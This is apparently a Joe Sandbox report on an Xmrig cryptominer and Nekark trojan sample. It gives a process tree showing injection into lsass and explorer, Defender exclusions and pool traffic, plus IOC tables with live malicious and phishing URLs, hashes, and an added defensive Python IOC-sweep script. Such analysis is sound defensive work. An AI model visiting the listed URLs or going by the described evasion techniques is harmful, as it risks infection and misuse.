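The powercfg and wusa findings are the ones worth escalating on their own: neither command has a plausible reason to be launched from a freshly extracted Setup.exe or from a randomly named executable under ProgramData.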
MITRE ATT&CK matrix, listed per tactic (numbers in parentheses are the counts shown in the matrix cells):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: Windows Management Instrumentation (41), Native API (2), Service Execution (1), PowerShell (1), Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
Persistence: DLL Side-Loading (1), Windows Service (11), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Privilege Escalation: DLL Side-Loading (1), Access Token Manipulation (1), Windows Service (11), Process Injection (713), Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Defense Evasion: Disable or Modify Tools (2), Obfuscated Files or Information (1), DLL Side-Loading (1), File Deletion (1), Masquerading (21), Virtualization/Sandbox Evasion (161), Access Token Manipulation (1), Process Injection (713), Rundll32 (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
Discovery: System Time Discovery (1), File and Directory Discovery (2), System Information Discovery (56), Security Software Discovery (381), Process Discovery (2), Virtualization/Sandbox Evasion (161), Application Window Discovery (1), System Owner/User Discovery, Network Sniffing
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Command and Control: Encrypted Channel (1), Non-Standard Port (1), Non-Application Layer Protocol (1), Application Layer Protocol (1), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement
Behavior Graph ID: 1408951. Sample: MDE_File_Sample_c7859a06708... Start date: 14/03/2024. Architecture: WINDOWS. Score: 100.
The graph, written out as a process tree (bracketed numbers are the counters shown on the graph node; "injected" marks a process the parent injected into rather than started):

Start
  DNS: monerooceans.stream, gulf.moneroocean.stream
  Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Yara detected Xmrig cryptocurrency miner; 6 other signatures
  started jnxsifnrdetl.exe
    dropped: C:\Windows\Temp\sidneyeifgjd.sys, PE32+
    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Protects its processes via BreakOnTermination flag; 3 other signatures
    started dialer.exe
      Signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
      injected svchost.exe
        Network: 192.168.2.14 (unknown), 192.168.2.13 (unknown), 192.168.2.23 (unknown)
      injected svchost.exe
        Network: 72.21.81.240, ports 49696, 49697, 80, EDGECASTUS, United States
      54 other processes
    started dialer.exe
      Network: monerooceans.stream 44.196.193.227, ports 10128, 49704, AMAZON-AESUS, United States (Detected Stratum mining protocol)
      Signatures: Query firmware table information (likely to detect VMs); Found strings related to Crypto-Mining
    started cmd.exe
      2 other processes
    11 other processes
      started conhost.exe
      9 other processes
  started Setup.exe
    Signatures: Suspicious powershell command line found; Uses powercfg.exe to modify the power settings; Adds a directory exclusion to Windows Defender
    started powershell.exe [8]
      started Setup.exe [1 2]
        dropped: C:\ProgramData\...\jnxsifnrdetl.exe, PE32+
        Signatures: Modifies the context of a thread in another process (thread injection); Adds a directory exclusion to Windows Defender; Modifies power options to not sleep / hibernate
        started dialer.exe [1]
          Signatures: Contains functionality to inject code into remote processes; Writes to foreign memory regions; Allocates memory in foreign processes; 3 other signatures
          injected lsass.exe
            Signature: Writes to foreign memory regions
          3 other processes
        started cmd.exe [1]
          started conhost.exe
          started wusa.exe
        started powershell.exe [9]
          started conhost.exe
        13 other processes
          started conhost.exe (three instances)
          10 other processes
      started conhost.exe
  started svchost.exe
    Signature: Changes security center settings (notifications, updates, antivirus, firewall)
    started MpCmdRun.exe
      started conhost.exe
  8 other processes
    Network: 127.0.0.1 (unknown)
    Signature: Query firmware table information (likely to detect VMs)

No Antivirus matches

Source | Detection | Scanner | Label
C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | 100% | Avira | TR/AD.Nekark.ziece
C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | 96% | ReversingLabs | Win64.Trojan.Nekark
C:\Windows\Temp\sidneyeifgjd.sys | 5% | ReversingLabs |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://dynamic.t | 0% | URL Reputation | safe
https://xmrig.com/docs/algorithms | 0% | URL Reputation | safe
https://172.94.1q | 0% | Avira URL Cloud | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
http://schemas.microsoft.co | 0% | Avira URL Cloud | safe
https://excel.office.comSRD1% | 0% | Avira URL Cloud | safe
https://powerpoint.office.comSRD13 | 0% | Avira URL Cloud | safe
https://outlook.comSRD1- | 0% | Avira URL Cloud | safe
https://powerpoint.office.comN | 0% | Avira URL Cloud | safe
https://word.office.comSRD1# | 0% | Avira URL Cloud | safe
http://ctldl.w | 0% | Avira URL Cloud | safe
http://www.bingmapsportal.comc | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
monerooceans.stream | 44.196.193.227 | true | true | | unknown
gulf.moneroocean.stream | unknown | unknown | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                  high
                                                                                                                                  https://login.windows.net/common/oauth2/authorizeened(OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://login.windows.net/common/oauth2/authorizespacexOfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://ctldl.wsvchost.exe, 00000069.00000000.1576416010.000001B311C96000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://login.windows.net/common/oauth2/authorizeoggerpOfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://login.windows.net/common/oauth2/authorizenOfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000006.00000002.1371073026.0000022ADE677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370002682.0000022ADE671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000006.00000003.1370376221.0000022ADE632000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370106910.0000022ADE665000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
IP | Domain | Country | ASN | ASN Name | Malicious
72.21.81.240 | unknown | United States | 15133 | EDGECASTUS | false
44.196.193.227 | monerooceans.stream | United States | 14618 | AMAZON-AES | true
                                                                                                                                                IP
                                                                                                                                                192.168.2.13
                                                                                                                                                192.168.2.23
                                                                                                                                                192.168.2.14
                                                                                                                                                127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1408951
Start date and time: 2024-03-14 13:58:53 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 79
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 61
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip
Detection: MAL
Classification: mal100.spyw.evad.mine.winZIP@108/24@1/6
EGA Information:
• Successful, ratio: 57.1%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .zip
• Excluded processes from analysis (whitelisted): dllhost.exe, consent.exe, SIHClient.exe, MoUsoCoreWorker.exe, WmiPrvSE.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.56.210.93, 20.114.59.183
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
• Execution Graph export aborted for target Setup.exe, PID 1036 because there are no executed functions
• Execution Graph export aborted for target Setup.exe, PID 6476 because there are no executed functions
• Execution Graph export aborted for target jnxsifnrdetl.exe, PID 4248 because there are no executed functions
• Not all processes were analysed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big: too many NtCreateKey calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Report size getting too big: too many NtReadVirtualMemory calls found.
• VT rate limit hit for: MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip
Time | Type | Description
13:59:25 | API Interceptor | 38240x Sleep call for process: svchost.exe modified
13:59:33 | API Interceptor | 63x Sleep call for process: powershell.exe modified
14:00:18 | API Interceptor | 261554x Sleep call for process: winlogon.exe modified
14:00:19 | API Interceptor | 251436x Sleep call for process: lsass.exe modified
14:00:24 | API Interceptor | 222105x Sleep call for process: dwm.exe modified
14:00:36 | API Interceptor | 612x Sleep call for process: spoolsv.exe modified
14:00:39 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
14:00:58 | API Interceptor | 91x Sleep call for process: OfficeClickToRun.exe modified
14:01:00 | API Interceptor | 253x Sleep call for process: explorer.exe modified
14:01:02 | API Interceptor | 59x Sleep call for process: sihost.exe modified
14:01:09 | API Interceptor | 40x Sleep call for process: ctfmon.exe modified
14:01:10 | API Interceptor | 30x Sleep call for process: dasHost.exe modified
14:01:30 | API Interceptor | 1x Sleep call for process: RuntimeBroker.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
72.21.81.240 | https://dl.silhcdn.com/1dc240dfb4eb6c5f | malicious | Unknown
 | https://controller-software.minebea-intec.com/PC-Tools/IndicatorBrowser2.1.0.1.exe | malicious | Unknown
 | https://ssoauth01.screenconnect.com/Bin/ScreenConnect.Client.exe?h=instance-w08c5r-relay.screenconnect.com&p=443&k=BgIAAACkAABSU0ExAAgAAAEAAQBtb%2FXciCJO5hHyAR3NG5qwkHgKE4K5jxeGBs35Nlncjh1l6g%2B23I88rvlqmL%2FU%2BHDK35q63nY%2BZ%2BacGdqbEGbCs9%2BC5ELjJTyrUFEL0gVqegeArzyszYoIS4ijuI8mGGKzW9tytW5tQhqCPuQeWdSbe0f0ttBWIUk6MfP0L7WpImwpbDzvxtmyMWSxZ8JZg39F6e1w8cQHzLH0aqJX9uvQgIvogbJB0mFXWURVi9ErahW%2BwkXWptsr99acbACeWvHhej11zT9ZPHMMaluuXTiYnS06xPJTJZglT5hvMbl15uReewBWhhwiEVa2S%2BD%2BCQEQGLsz1dpJNd543dQllUPh&s=2d10f7e2-3372-4377-b81f-4a7ead155b40&i=&e=Support&y=Guest&r= | malicious | ScreenConnect Tool
 | MDE_File_Sample_891148f4a44499290ad196a880d833428cfc751e.zip | malicious | Unknown
 | Summaryform_TgQFBSAqdC.zip | malicious | AsyncRAT, PureLog Stealer
 | MDE_File_Sample_41d8deaea0ddb3ed4d88efabf26f376282b04177.zip | malicious | Unknown
 | SecuriteInfo.com.Program.RemoteAdminNET.1.9196.7480.msi | malicious | Unknown
 | file.exe | malicious | Amadey, RisePro Stealer
 | SecuriteInfo.com.Program.RemoteAdminNET.1.5343.8667.msi | malicious | Unknown
 | OriginalMessage.txt.msg | malicious | HTMLPhisher
44.196.193.227 | SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | malicious | Xmrig
 | GoogleCrashHandler.exe | malicious | Xmrig
 | yljlbesdmoas.exe | malicious | Xmrig
 | BraveCrashHandler.exe | malicious | Nanominer, Xmrig
 | GoogleCrashHandler.exe | malicious | Xmrig
 | SecuriteInfo.com.W64.Rozena.HA.gen.Eldorado.22978.31544.exe | malicious | Xmrig
Match | Associated Sample Name / URL | Detection | Threat Name | Context (resolved IP)
monerooceans.stream | 17ae2fbf36a41622374adfd3b1608e08.10.dr | malicious | Unknown | 44.224.209.130
 | SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | malicious | Xmrig | 44.196.193.227
 | GoogleCrashHandler.exe | malicious | Xmrig | 44.196.193.227
 | yljlbesdmoas.exe | malicious | Xmrig | 44.196.193.227
 | GoogleCrashHandler.exe | malicious | Xmrig | 44.196.193.227
 | GoogleCrashHandler.exe | malicious | Xmrig | 44.224.209.130
 | vHAgn4Dx00.exe | malicious | AveMaria, UACMe, Xmrig | 44.224.209.130
 | vABMEuk0Ie.exe | malicious | Xmrig | 44.196.193.227
 | SecuriteInfo.com.W64.Rozena.HA.gen.Eldorado.22978.31544.exe | malicious | Xmrig | 44.196.193.227
 | jJ4UO2hOfp.exe | malicious | Xmrig | 44.224.209.130
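The IP and domain tables above are the part of this report worth carrying into detection: monerooceans.stream is the only contact flagged malicious, and across this analysis and the associated Xmrig samples it resolved to 44.196.193.227 and 44.224.209.130, both in Amazon address space, so a pool domain can move between front IPs while the domain stays constant. The Python script below is an added example, not part of the Joe Sandbox report, that sweeps DNS and connection log lines for those indicators. The log format and every log line are constructed for the example; the indicator values come from the tables above, and the whitelisted fs.microsoft.com / 23.56.210.93 and the non-malicious 72.21.81.240 from this report are included as negatives to confirm that only pool traffic is flagged.

```python
"""IOC sweep for the mining-pool indicators in this report.

Added example, not part of the Joe Sandbox report. Indicator values come from
the report's IP/domain tables; the log format and the log lines are constructed.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Indicators from the report: the pool domain flagged malicious and the IPs it
# resolved to in this and the associated Xmrig analyses.
IOC_DOMAINS = {"monerooceans.stream"}
IOC_IPS = {ipaddress.ip_address(a) for a in ("44.196.193.227", "44.224.209.130")}

# Constructed log format (an assumption, not any real product's format):
#   <timestamp> DNS  <client> <queried name> A=<answer ip>
#   <timestamp> CONN <client> <dest ip>[:<port>]
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<kind>DNS|CONN)\s+(?P<src>\S+)\s+(?P<dst>\S+)(?:\s+(?P<extra>.*))?$"
)


@dataclass(frozen=True)
class Hit:
    ts: str
    kind: str
    src: str
    dst: str
    reason: str


def _host(dst: str) -> str:
    """Strip a trailing :port from 'host:port' (the IOCs here are IPv4 and DNS names only)."""
    return dst.rsplit(":", 1)[0] if dst.count(":") == 1 else dst


def classify(dst: str, extra: Optional[str]) -> Optional[str]:
    """Return why dst/extra matches an indicator, or None when it does not."""
    host = _host(dst).lower().rstrip(".")
    # Pool domain, exact or any subdomain of it.
    for dom in IOC_DOMAINS:
        if host == dom or host.endswith("." + dom):
            return f"pool domain {dom}"
    # Direct connection to a known pool IP (dst is an IP literal).
    try:
        if ipaddress.ip_address(host) in IOC_IPS:
            return f"pool ip {host}"
    except ValueError:
        pass
    # A different name whose DNS answer is a pool IP: catches a renamed front
    # domain that still lands on the same pool infrastructure.
    for tok in re.findall(r"\b\d{1,3}(?:\.\d{1,3}){3}\b", extra or ""):
        try:
            if ipaddress.ip_address(tok) in IOC_IPS:
                return f"resolved to pool ip {tok}"
        except ValueError:
            continue
    return None


def sweep(lines: Iterable[str]) -> List[Hit]:
    """Parse each log line and collect the ones that touch an indicator."""
    hits: List[Hit] = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # lines not in the constructed format are skipped
        reason = classify(m["dst"], m["extra"])
        if reason:
            hits.append(Hit(m["ts"], m["kind"], m["src"], m["dst"], reason))
    return hits


# Constructed sample log. Clients are the report's private sandbox IPs;
# fs.microsoft.com / 23.56.210.93 and 72.21.81.240 are the report's
# non-malicious entries and must not be flagged. Ports are made up.
SAMPLE_LOG = """\
2024-03-14T14:00:41Z DNS  192.168.2.13 monerooceans.stream A=44.196.193.227
2024-03-14T14:00:41Z CONN 192.168.2.13 44.196.193.227:3333
2024-03-14T14:00:42Z DNS  192.168.2.14 fs.microsoft.com A=23.56.210.93
2024-03-14T14:00:50Z CONN 192.168.2.23 72.21.81.240:443
2024-03-14T14:01:00Z DNS  192.168.2.14 example.test A=44.224.209.130
"""

if __name__ == "__main__":
    for h in sweep(SAMPLE_LOG.splitlines()):
        print(f"{h.ts} {h.kind:<4} {h.src} -> {h.dst}: {h.reason}")
```

Run as written, the sweep flags three of the five constructed lines: the direct query for the pool domain, the connection to 44.196.193.227, and the query for an unrelated name that resolved to 44.224.209.130. The last rule is the one that earns its keep on a real network, because a miner operator changes the front domain far more readily than the pool IP behind it; the two benign lines pass through untouched.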
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
EDGECASTUS | https://onedrive.live.com/redir?resid=D557EC206FFB7160!18763&authkey=!AJvgTwV6CZ5apWY&page=View&wd=target(Quick%20Notes.one%7Ca4839789-5727-4f4a-8cb7-8f7ca326b900/GEOlogik%20-%20Wilbers%20%20Oeder%20GmbH%7C792c61c4-fbc3-4124-a7a0-3de0f5bd7abc/)&wdorigin=NavigationUrl | malicious | HtmlDropper, HTMLPhisher | 152.195.19.97
 | https://tracker.club-os.com////campaign/click?46960ms46960gId444d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=46960%25E3%2580%2582exoatlettechchn%25E3%2580%2582com/poop/46960%2F%2FUm9ueS5EUkVTU0VMQUVSU0BGQU5DLkZHT1YuQkU=& | malicious | Unknown | 192.229.173.207
 | Acrobat_Set-Up.exe | malicious | Unknown | 152.195.19.97
 | BraveBrowserSetup-BRV002.exe | malicious | Unknown | 152.195.19.97
 | BraveBrowserSetup-BRV002.exe | malicious | Unknown | 152.195.19.97
 | file.exe | malicious | Glupteba, Mars Stealer, Stealc, Vidar | 192.229.211.108
 | SecuriteInfo.com.Trojan.PackedNET.2742.9443.15673.exe | malicious | Glupteba, Mars Stealer, Socks5Systemz, Stealc, Vidar | 192.229.211.108
 | https://prezi.com/i/view/NEzvDMiy71AZ2uVfaGcJ | malicious | Unknown | 192.229.210.163
 | EXTERNAL New Fax received from eFax - Wednesday 13 March 2024.msg | malicious | ScreenConnect Tool | 192.229.211.108
 | https://assets-usa.mkt.dynamics.com/eafd3d58-f4cb-ee11-9073-6045bd050506/digitalassets/standaloneforms/a5094c23-a3e0-ee11-904c-6045bd02a830 | malicious | HTMLPhisher |
                                                                                                                                                                                • 152.199.4.44
                                                                                                                                                                                AMAZON-AESUShttps://interacty.me/projects/2eea3318531e89d3Get hashmaliciousUnknownBrowse
                                                                                                                                                                                • 34.202.177.173
                                                                                                                                                                                https://claycohra.knack.com/untitled-app#elderly-housing-corporation/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 3.219.104.238
                                                                                                                                                                                file.exeGet hashmaliciousAmadey, GluptebaBrowse
                                                                                                                                                                                • 18.205.93.0
                                                                                                                                                                                https://tracker.club-os.com////campaign/click?46960ms46960gId444d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=46960%25E3%2580%2582exoatlettechchn%25E3%2580%2582com/poop/46960%2F%2FUm9ueS5EUkVTU0VMQUVSU0BGQU5DLkZHT1YuQkU=&Get hashmaliciousUnknownBrowse
                                                                                                                                                                                • 3.220.144.103
                                                                                                                                                                                https://form.questionscout.com/65f2bbc50f97807913312091Get hashmaliciousUnknownBrowse
                                                                                                                                                                                • 34.234.52.18
                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                • 18.205.93.0
                                                                                                                                                                                S78uYNGteB.apkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 52.73.154.19
                                                                                                                                                                                Acrobat_Set-Up.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 18.211.200.223
                                                                                                                                                                                SecuriteInfo.com.ELF.Agent-AIN.23345.28475.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 54.5.113.144
                                                                                                                                                                                SecuriteInfo.com.ELF.Mirai-AJJ.2909.8691.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 52.202.47.207
                                                                                                                                                                                No context
Match: C:\Windows\Temp\sidneyeifgjd.sys
Associated samples (Detection / Threat Name):
• jeNQRsRgBe.exe (malicious / Xmrig)
• RemiTool v2.exe (malicious / Xmrig)
• SecuriteInfo.com.Trojan.Siggen27.16296.12545.31206.exe (malicious / Xmrig)
• Sms OTP Bypass.exe (malicious / Xmrig)
• file.exe (malicious / Unknown)
• SecuriteInfo.com.Win64.TrojanX-gen.27837.22565.exe (malicious / PureLog Stealer, Xmrig)
• xwizlLLNtX.exe (malicious / PureLog Stealer, Xmrig, zgRAT)
• gQZvXi6Osc.exe (malicious / PureLog Stealer, Xmrig, zgRAT)
• zLAr8hkDsu.exe (malicious / PureLog Stealer, Xmrig, zgRAT)
• udgE7Q3gs6.exe (malicious / PureLog Stealer, Xmrig, zgRAT)

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 8192
Entropy (8bit): 0.35999246155449205
Encrypted: false
SSDEEP: 6:6xdoaaD0JOCEfMuaaD0JOCEfMKQmDWxdoaaD0JOCEfMuaaD0JOCEfMKQmD:3aaD0JcaaD0JwQQTaaD0JcaaD0JwQQ
MD5: 72CF57557891086FFCF5496120EBA415
SHA1: 3905AB3A7DD5933B4E17401B911B5FDB17AFE62B
SHA-256: 6C3BE79F6B818243D6538453077C36C23E90106349D7F080AAD7C1D1745FAFE2
SHA-512: 9F94E19ED7BF3C0D629AA177959093D580E7FE59479066BA033C3F3D78E63C2BBC7DCA950A415B5239AC28F5B839E11410D988AA8E762B72F316F31DC4E894F6
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.7995225156260047
Encrypted: false
SSDEEP: 3072:yJjAgNE4Pj5vHcjTcyBP9UjaaQ/ka4qWj:QAgN8nj/ka4
MD5: 64532D8A1B4EA9FEAF11979AAE0DCD85
SHA1: 54CDFB65215977EA8B29C113F19D72B2263348F9
SHA-256: 782C26530D5085EF208598AAD42C22BB86107D4C24E11D6AB4446385979EBFEB
SHA-512: 4239144A044B2718740EBF042706BBAED6F38081A25BAAF425ABA731210470231DD4377AABC2293500D254E8812F6E4772B2DA5FEE3D80511DAB01BD9D484693
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x9ad319e8, page size 16384, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.661673741907652
Encrypted: false
SSDEEP: 1536:bSB2ESB2SSjlK/BkfiQWy10MctJ+t9ka4XQ0wYkr3g16D2UPkLk+k4t4eCu3uKRT:bazaHL7uka4DU2UGRF3p3pvHzrHBHz
MD5: 1ACCBE89EF93E2945F773F8E732D46E7
SHA1: B9784BF804BE947FF47DA0D8935B839D062C45B2
SHA-256: 110235962ECACCDDFA7A3826C5960CC364BB95A09DDE237FA62ADA0C63A3C9DC
SHA-512: 696E14179DFC54F2C2F047D5A281972E57653C23A777C55957C747876F43B18C2C0A9C106FB84D4C8BFE7FDC673C83DB14CCF5E0E76B3B88CE354AEB498EB12A
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.07368868268858289
Encrypted: false
SSDEEP: 3:9yl/lUetYeIn5rH//lMrmoxorBrk//lacmo//lallUZ+/l/Q:UltNzmrX+rmourdkXoXoXA7
MD5: 19216A613A01633EB222CE507898CFCE
SHA1: 95C7A7B40E5C5B998C230B3A16693884E092D4D7
SHA-256: AFCAEF1314335A4887A2BF9ED44E7EE2D36863ECE31A4B2AA85F8C9B4278D686
SHA-512: 4B4AE7A33733B7B76F051F8A8BA7B4AB0E86CF68760D1EA6891390878C060D0BEBC5457D70D25F920DD4FA777F9B0B007A01E323C7234D73CC9C9ACDBC6E29E4
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 8192
Entropy (8bit): 2.450090112206548
Encrypted: false
SSDEEP: 48:iGtmEGt2GMRZqbt2YbtybtrBq7bt6cbt9/btKa/btMxbts:iiNiTZ5ZyZ4Z6cZNZNZAZs
MD5: 3E4880DDB501E9706C125E848F9FDAC3
SHA1: 593BB492A8E645607ED4446F8D94D550F8D0C274
SHA-256: C361070C481E60E94D260CDC1F0B5984735CFDE03CA02D218AD0C2D0A74A6FC4
SHA-512: 54840AD1FB47E08DFE1C8439A16AD808AD6A96F8EB93D0D54C0592DD1B31DF9385AF3506AEE828A1995A655C3908D090C743082C4D1284074E98B689CC4650FB
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 5614592
Entropy (8bit): 6.625028493983766
Encrypted: false
SSDEEP: 98304:9p8Rhr3GBsnEHQ4ZFRQ0d/OxolgF2+BN9+cNUejaFZHF+1CzsMtnUUPZNj:9p8RhSZzGxEz+BN9+cNUhv+1C9tnUUh9
MD5: DF65134B0B2B2CC03F07647794B274E5
SHA1: C7859A067082AA31648A9B8F2ABD982C504DD0AF
SHA-256: 3E3E3BA56FD7260C9B12CCBE0310201D94F128757F31550E3C3D9D0F72899085
SHA-512: 1DCCCF9934F966F90D8D52A2392755EDCACE9E4D6DB456994BFD61ABE059775108D0BF1B9A810B9E0904590D1D2DE4DEE9204F96AD13F62E539F8D981D7DE8D7
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 96%
Process: C:\Windows\System32\svchost.exe
File Type: XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 999
Entropy (8bit): 4.966299883488245
Encrypted: false
SSDEEP: 24:Jd4T7gw4TchTGBLtKEHcHGuDyeHRuDye6MGFiP6euDyRtz:34T53VGLv8HGuDyeHRuDye6MGFiP6euy
MD5: 24567B9212F806F6E3E27CDEB07728C0
SHA1: 371AE77042FFF52327BF4B929495D5603404107D
SHA-256: 82F352AD3C9B3E58ECD3207EDC38D5F01B14D968DA908406BD60FD93230B69F6
SHA-512: 5D5E65FCD9061DADC760C9B3124547F2BABEB49FD56A2FD2FE2AD2211A1CB15436DB24308A0B5A87DA24EC6AB2A9B0C5242D828BE85BD1B2683F9468CE310904
Malicious: false
Preview:
<?xml version="1.0" encoding="utf-8"?>
<software_identification_tag xmlns="http://standards.iso.org/iso/19770/-2/2009/schema.xsd">
  <entitlement_required_indicator>true</entitlement_required_indicator>
  <product_title>Windows 10 Pro</product_title>
  <product_version>
    <name>10.0.19041.1865</name>
    <numeric>
      <major>10</major>
      <minor>0</minor>
      <build>19041</build>
      <review>1865</review>
    </numeric>
  </product_version>
  <software_creator>
    <name>Microsoft Corporation</name>
    <regid>regid.1991-06.com.microsoft</regid>
  </software_creator>
  <software_licensor>
    <name>Microsoft Corporation</name>
    <regid>regid.1991-06.com.microsoft</regid>
  </software_licensor>
  <software_id>
    <unique_id>Windows-10-Pro</unique_id>
    <tag_creator_regid>regid.1991-06.com.microsoft</tag_creator_regid>
  </software_id>
  <tag_creator>
    <name>Microsoft Corporation</name>
    <regid>regid.1991-06.com.microsoft</regid>
  </tag_creator>
</software_identification_tag>
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 20884
Entropy (8bit): 5.606009077553241
Encrypted: false
SSDEEP: 384:QMBrkgGjZJZfBkXhr7FhTRn4UaiQw0Yjn03Mcg4CPfbFlgqd:VrkXgXhrLTRtaLjw2TMbYqd
MD5: 204A7D1FCA6363923592AF1CB04D43E9
SHA1: DBFF37569E6F344B6671FFA0B1A4024755CA3DAF
SHA-256: C88EFAF932F22C35A480525E2E25517FBF0BA210D4600A2A5FA92331D9DDC62E
